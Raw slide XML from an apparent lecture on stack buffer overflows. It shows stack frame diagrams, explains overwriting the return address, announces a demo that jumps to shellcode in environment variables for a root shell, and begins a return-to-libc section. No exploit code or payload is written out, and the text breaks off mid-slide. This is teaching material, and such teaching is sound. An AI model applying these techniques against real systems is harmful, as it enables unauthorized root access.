              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>  if(check_auth(argv[1]) ){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>	// access granted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Shape 394"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2192650" x="4054500"/>
            <a:ext cy="3727799" cx="4003200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The stack is a LIFO structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Shape 395"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1757700" x="6545250"/>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lang="en"/>
              <a:t>auth_flag variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>password_buffer variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>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*password(function argument)</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main()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ct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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="Shape 400"/>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Stack Frame Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Shape 401"/>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 each stack frame contains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>local variables for that function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>the return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>so EIP can be restored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>When a function returns (finishes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>the stack frame is popped off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>and return address is used </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	to restore the EIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>If we can alter the return address, we can return</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>to other places in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    what could go wrong??? :)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="402" name="Shape 402"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1757700" x="6545250"/>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rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>local vars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>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function arguments</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previous function()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ct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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="Shape 407"/>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Stack Frame Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Shape 408"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1723050" x="457200"/>
            <a:ext cy="4840199" cx="8229600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="Shape 409"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1757700" x="6545250"/>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rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>local vars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>saved frame pointer (SFP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>return address (ret)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>function arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>previous function()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="Shape 410"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3482575" x="5461875"/>
            <a:ext cy="1119350" cx="1024750"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="40990" extrusionOk="0" h="44774">
                <a:moveTo>
                  <a:pt y="0" x="40990"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt y="11036" x="9459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="17973" x="11667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="20810" x="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="24909" x="12297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="38468" x="9459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="44774" x="39729"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="Shape 411"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3758475" x="2883342"/>
            <a:ext cy="536100" cx="2570699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>these get pushed prior to jumping to the function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="Shape 412"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2930775" x="6202850"/>
            <a:ext cy="520275" cx="331075"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="13243" extrusionOk="0" h="20811">
                <a:moveTo>
                  <a:pt y="0" x="10405"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt y="3469" x="1892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="9144" x="5676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="10090" x="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="13874" x="5676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="17027" x="2838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="20811" x="13243"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd w="lg" len="lg" type="none"/>
            <a:tailEnd w="lg" len="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Shape 413"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2564791" x="2866627"/>
            <a:ext cy="689099" cx="3336300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en"/>
              <a:t>This gets saved in the first lines of a function, which is the function "prologue".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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="Shape 418"/>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DEMO #1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="Shape 419"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3600451" x="685800"/>
            <a:ext cy="900599" cx="6400799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="91425" rIns="91425" lIns="91425" tIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We're going to exploit the stack frame to change the return address to jump to shellcode that we've hidden in the environment variables, to get a root shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Goto slides @ the end to see walkthroughs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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="Shape 424"/>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Return to lib c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="Shape 42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sz="2400" lang="en" i="1"/>
              <a:t>Usually the stack is </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" sz="2400" lang="en" i="1"/>
              <a:t>not executable (NX)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en" i="1"/>
              <a:t>, as we will see next time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can't use shellcode on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>no code injection!  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en"/>
              <a:t>D:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-342900" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>can still control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>EIP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(by overriding a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>RET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>value on</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the stack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>can point it elsewhere and still spawn a shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="1" indent="-342900" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>can point to dynamic-link library code!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-342900" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>must be a common dynamic library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="2" indent="-342900" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>must allow attacker to be flexible, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>and spawn shell or w/e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="1828800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
